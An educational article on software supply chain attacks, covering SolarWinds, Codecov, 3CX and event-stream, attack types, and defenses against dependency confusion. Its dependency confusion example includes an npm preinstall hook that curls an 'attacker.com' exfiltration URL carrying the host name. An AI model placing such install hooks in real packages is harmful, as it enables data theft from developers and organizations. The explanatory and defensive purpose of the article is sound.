Supply Chain Attacks: Compromising the Source

Why hack one target when you can hack the software they trust? Supply chain attacks compromise software before it reaches victims - affecting thousands of organizations through a single intrusion. These are among the most sophisticated and impactful attacks.

The Supply Chain Concept

Software Supply Chain Attack Surface

┌─────────────────────────────────────────────────────────────────────────────┐
│                    SOFTWARE SUPPLY CHAIN                                     │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                             │
│   DEVELOPMENT          BUILD              DISTRIBUTION        DEPLOYMENT    │
│   ───────────          ─────              ────────────        ──────────    │
│                                                                             │
│   ┌─────────┐        ┌─────────┐        ┌─────────┐        ┌─────────┐    │
│   │ Source  │───────►│  CI/CD  │───────►│ Package │───────►│ Customer│    │
│   │ Code    │        │ Pipeline│        │ Registry│        │ Install │    │
│   └─────────┘        └─────────┘        └─────────┘        └─────────┘    │
│        │                  │                  │                  │          │
│        ▼                  ▼                  ▼                  ▼          │
│   ATTACK VECTORS:                                                          │
│   ├── Compromise dev    ├── Inject into    ├── Typosquatting  ├── MitM    │
│   │   credentials       │   build scripts  │   packages        │   updates │
│   ├── Malicious         ├── Poison build   ├── Dependency      ├── Rogue  │
│   │   commits           │   dependencies   │   confusion       │   mirrors │
│   └── Insider threat    └── Compiler       └── Account         └── Fake   │
│                             trojans            hijacking           patches │
│                                                                             │
│   NOTABLE EXAMPLES:                                                         │
│   ├── SolarWinds (build system)                                            │
│   ├── Codecov (CI/CD script)                                               │
│   ├── event-stream (npm package)                                           │
│   ├── 3CX (build compromise)                                               │
│   └── PyPI/npm typosquatting (ongoing)                                     │
│                                                                             │
└─────────────────────────────────────────────────────────────────────────────┘

Major Supply Chain Attacks

SolarWinds SUNBURST (2020)

The most sophisticated supply chain attack publicly known. Russian APT29 compromised SolarWinds' build system, inserting malicious code into the Orion IT monitoring platform. 18,000+ organizations downloaded the trojanized update.

Attack Chain

Attackers gained access to SolarWinds build environment
Modified source code during build process (not in repository)
Backdoor lay dormant for 2 weeks after installation
Checked for security tools before activating
C2 disguised as legitimate Orion traffic
Victims included US Treasury, DHS, Microsoft, FireEye

Codecov (2021)

Attackers modified Codecov's Bash Uploader script, exfiltrating environment variables (including secrets and credentials) from 29,000+ CI/CD pipelines for 2+ months.

3CX (2023)

Desktop VoIP application compromised via supply chain. Traced back to a prior supply chain attack on a trading software company. Nested supply chain attacks—a first.

event-stream / npm (2018)

Malicious maintainer took over popular npm package (2M weekly downloads), added code targeting a specific Bitcoin wallet application. Showed how trust in open source can be exploited.

Types of Supply Chain Attacks

Build System Compromise

Inject malicious code during compilation/packaging. Code appears legitimate in source control.

Example: SolarWinds, 3CX

Dependency Confusion

Example: Alex Birsan's research ($130k in bug bounties)

Typosquatting

Example: Ongoing on PyPI, npm, RubyGems

Account Takeover

Compromise maintainer accounts to push malicious updates to legitimate packages.

Example: event-stream, ua-parser-js

Dependency Confusion Attack

Discovered by Alex Birsan in 2021. Exploits how package managers resolve dependencies when both public and private registries exist.

How Dependency Confusion Works

# Company has internal package: company-utils v1.0.0
# Listed in package.json but hosted on private registry

# Attacker registers on public npm:
npm publish company-utils --version 99.0.0

# When developer runs: npm install
# Package manager sees:
#   - Private: company-utils@1.0.0
#   - Public:  company-utils@99.0.0
# Higher version wins → malicious package installed

# Attacker's package.json includes:
"scripts": {
  "preinstall": "curl https://attacker.com/exfil?host=$(hostname)"
}

High-Value Targets

Birsan's research successfully compromised Apple, Microsoft, PayPal, Shopify, Netflix, Tesla, Uber, and dozens more using this technique. Most paid bug bounties rather than face exploitation.

Defending Against Supply Chain Attacks

Build Security

Isolated build environments
Reproducible builds
Code signing verification
Build artifact attestation
SLSA framework compliance

Dependency Management

Pin exact versions (no ranges)
Use lockfiles
Private registry priority
Namespace/scope packages
SCA tools (Snyk, Dependabot)

Dependency Confusion Mitigations

# npm - Use scoped packages
@company/internal-utils  # Can't be squatted on public registry

# pip - Use --index-url exclusively
pip install --index-url https://private.company.com/simple/ package

# Register placeholder packages on public registries
# Claim your internal package names before attackers do

# .npmrc - Force private registry for scoped packages
@company:registry=https://npm.company.com/